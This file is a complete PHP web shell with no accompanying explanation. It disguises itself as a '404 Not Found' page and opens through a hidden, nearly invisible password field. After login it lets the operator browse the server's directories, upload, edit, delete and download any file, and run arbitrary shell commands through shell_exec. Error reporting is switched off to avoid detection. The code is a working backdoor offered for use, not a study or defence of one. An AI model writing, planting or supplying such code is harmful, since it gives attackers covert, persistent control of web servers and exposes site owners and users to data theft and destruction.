<?php
error_reporting(0);$P='cfcd208495d565ef66e7dff9f98764da';
if(!isset($_COOKIE['k'])||md5($_COOKIE['k'])!==$P){
if(isset($_POST['pw'])&&md5($_POST['pw'])===$P){setcookie('k',$_POST['pw'],time()+86400,'/');header('Location:'.$_SERVER['REQUEST_URI']);exit;}
http_response_code(404);
echo'<!DOCTYPE html><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p>';
echo'<form method="post"><input type="password" name="pw" style="background:#fff;border:1px solid #fff;color:#fff;width:1px;height:1px;position:fixed;bottom:0;right:0"></form></body></html>';exit;}
$d=isset($_GET['d'])?$_GET['d']:getcwd();$d=realpath($d)?:getcwd();chdir($d);
// Upload
if(isset($_FILES['f'])){$n=basename($_FILES['f']['name']);if(move_uploaded_file($_FILES['f']['tmp_name'],$d.'/'.$n))$msg="OK $n";else $msg="FAIL upload";}
// Delete
if(isset($_GET['del'])){$msg=@unlink($_GET['del'])?"Deleted":"Delete failed";}
// Edit save
if(isset($_POST['save'])&&isset($_GET['edit'])){$msg=@file_put_contents($_GET['edit'],$_POST['save'])!==false?"Saved":"Save failed";}
// Download
if(isset($_GET['dl'])&&is_file($_GET['dl'])){header('Content-Type:application/octet-stream');header('Content-Disposition:attachment;filename="'.basename($_GET['dl']).'"');readfile($_GET['dl']);exit;}
// Command
$cmdout='';if(isset($_POST['cmd'])&&$_POST['cmd']!==''){$cmdout=shell_exec($_POST['cmd'].' 2>&1');}
?><!DOCTYPE html><html><head><title>404</title><style>*{font-family:monospace;font-size:13px}body{background:#111;color:#ccc;margin:10px}a{color:#6cf;text-decoration:none}a:hover{text-decoration:underline}.ok{color:#0f0}.err{color:#f44}table{border-collapse:collapse;width:100%}td,th{border:1px solid #333;padding:3px 6px;text-align:left}tr:hover{background:#222}.dir{color:#ff0}.sz{color:#888}input,textarea,button{background:#222;color:#ccc;border:1px solid #444;padding:3px}button{cursor:pointer}button:hover{background:#333}</style></head><body>
<?php if(isset($msg)){echo'<b class="'.((strpos($msg,'FAIL')!==false||strpos($msg,'failed')!==false)?'err':'ok').'">'.$msg.'</b><br>';}?>
<b>Path:</b> <?=htmlspecialchars($d)?> [<?=is_writable($d)?'<span class="ok">W</span>':'<span class="err">R</span>'?>]
<form method="get" style="display:inline"><input name="d" value="<?=htmlspecialchars($d)?>" size="60"><button>Go</button></form>
<form method="post" enctype="multipart/form-data" style="display:inline"><input type="file" name="f"><button>Upload</button></form>
<hr>
<?php if(isset($_GET['edit'])&&is_file($_GET['edit'])):?>
<b>Editing:</b> <?=htmlspecialchars(basename($_GET['edit']))?>
<form method="post"><textarea name="save" rows="25" cols="120"><?=htmlspecialchars(file_get_contents($_GET['edit']))?></textarea><br><button>Save</button></form>
<a href="?d=<?=urlencode($d)?>">Back</a>
<?php else:?>
<table><tr><th>Name</th><th>Size</th><th>Perms</th><th>Act</th></tr>
<?php
$items=scandir($d);sort($items);
foreach($items as $f){
$fp=$d.'/'.$f;$isdir=is_dir($fp);$sz=$isdir?'-':number_format(filesize($fp));
$prm=substr(sprintf('%o',fileperms($fp)),-4);
$cls=$isdir?'dir':'';
echo'<tr><td class="'.$cls.'"><a href="?d='.urlencode($isdir?realpath($fp):$d).($isdir?'':'&edit='.urlencode($fp)).'">'.htmlspecialchars($f).'</a></td>';
echo'<td class="sz">'.$sz.'</td><td>'.$prm.'</td><td>';
if($f!=='.'&&$f!=='..'){
if(!$isdir)echo'<a href="?dl='.urlencode($fp).'">DL</a> ';
echo'<a href="?d='.urlencode($d).'&del='.urlencode($fp).'" onclick="return confirm(\'Delete?\')">Del</a>';
}
echo'</td></tr>';
}
?>
</table>
<hr>
<form method="post"><b>$</b> <input name="cmd" size="80" autofocus><button>Run</button></form>
<?php if($cmdout):?><pre><?=htmlspecialchars($cmdout)?></pre><?php endif;?>
<?php endif;?>
</body></html>